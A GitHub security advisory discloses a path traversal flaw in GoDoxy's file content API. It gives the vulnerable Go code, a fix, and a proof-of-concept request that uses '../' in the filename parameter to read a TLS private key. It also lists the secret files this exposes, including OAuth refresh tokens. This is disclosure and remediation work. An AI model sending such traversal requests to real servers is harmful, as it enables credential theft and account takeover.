Skip to content

Path Traversal in File API

Moderate
yusing published GHSA-4753-cmc8-8j9v Mar 21, 2026

Package

gomod github.com/yusing/godoxy (Go)

Affected versions

<= 0.27.4

Patched versions

None

Description

Summary

The file content API endpoint at /api/v1/file/content is vulnerable to path traversal. The filename query parameter is passed directly to path.Join(common.ConfigBasePath, filename) where ConfigBasePath = "config" (a relative path). No sanitization or validation is applied beyond checking that the field is non-empty (binding:"required").

An authenticated attacker can use ../ sequences to read or write files outside the intended config/ directory, including TLS private keys, OAuth refresh tokens, and any file accessible to the container's UID.

Root Cause

File: internal/api/v1/file/get.go, lines 68-73:

func (t FileType) GetPath(filename string) string {
    if t == FileTypeMiddleware {
        return path.Join(common.MiddlewareComposeBasePath, filename)
    }
    return path.Join(common.ConfigBasePath, filename)
}
  • common.ConfigBasePath = "config" — relative path, not absolute
  • path.Join("config", "../certs/key.pem") normalizes to "certs/key.pem" — escaping config/
  • No call to strings.HasPrefix, filepath.Rel, or any containment check exists
  • The format:"filename" struct tag is an OpenAPI/Swagger annotation only, not enforced by the validator

Proof of Concept

Environment

  • GoDoxy v0.27.4 (ghcr.io/yusing/godoxy:latest)
  • Authentication enabled with default credentials (admin/password)

Steps to Reproduce

Step 1 — Authenticate:

Step 2 — Read file outside config/ via path traversal:

GET /api/v1/file/content?type=config&filename=../certs/secret-agent-key.pem HTTP/1.1
Host: localhost:8888
Cookie: godoxy_token=<JWT>

HTTP Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Length: 43
Content-Type: application/godoxy+yaml
Expires: 0
Pragma: no-cache

THIS_IS_A_SECRET_PRIVATE_KEY_FOR_AGENT_TLS
image

Impact

Files accessible via this vulnerability

Path (relative to config/) Contents Risk
../certs/agents/{host}.zip CA cert + server cert + TLS private key Impersonate GoDoxy server to remote agents
../data/oauth_refresh_tokens.json OIDC refresh tokens for all active sessions Account takeover via token reuse
../../etc/ssl/certs/ca-certificates.crt System CA certificates Information disclosure
Any file readable by UID 1000 Depends on mounted volumes Variable

The PUT /api/v1/file/content endpoint is also affected. While the content must pass YAML schema validation (config or provider format), an attacker can write valid provider YAML files outside config/, potentially injecting malicious route definitions.

Suggested Remediation

Validate that the resolved path remains within the base directory:

func (t FileType) GetPath(filename string) (string, error) {
    var base string
    if t == FileTypeMiddleware {
        base = common.MiddlewareComposeBasePath
    } else {
        base = common.ConfigBasePath
    }

    absBase, _ := filepath.Abs(base)
    resolved, _ := filepath.Abs(filepath.Join(base, filename))

    if !strings.HasPrefix(resolved, absBase+string(filepath.Separator)) {
        return "", fmt.Errorf("path traversal detected: %s", filename)
    }

    return resolved, nil
}

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE ID

CVE-2026-33528

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

Credits